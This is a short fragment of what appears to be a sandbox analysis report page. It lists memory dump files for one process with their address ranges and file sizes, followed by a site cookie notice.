                                                                                                                                                                        • memory/4532-13-0x00007FFAE60C0000-0x00007FFAE6B81000-memory.dmp

                                                                                                                                                                          Filesize

                                                                                                                                                                          10.8MB

                                                                                                                                                                        • memory/4532-19-0x00007FFAE60C0000-0x00007FFAE6B81000-memory.dmp

                                                                                                                                                                          Filesize

                                                                                                                                                                          10.8MB

                                                                                                                                                                        • memory/4532-15-0x00007FFAE60C0000-0x00007FFAE6B81000-memory.dmp

                                                                                                                                                                          Filesize

                                                                                                                                                                          10.8MB

                                                                                                                                                                        • memory/4532-14-0x00007FFAE60C0000-0x00007FFAE6B81000-memory.dmp

                                                                                                                                                                          Filesize

                                                                                                                                                                          10.8MB

                                                                                                                                                                        • memory/4532-3-0x0000012D6E890000-0x0000012D6E8B2000-memory.dmp

                                                                                                                                                                          Filesize

                                                                                                                                                                          136KB

                                                                                                                                                                        We care about your privacy.

                                                                                                                                                                        This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.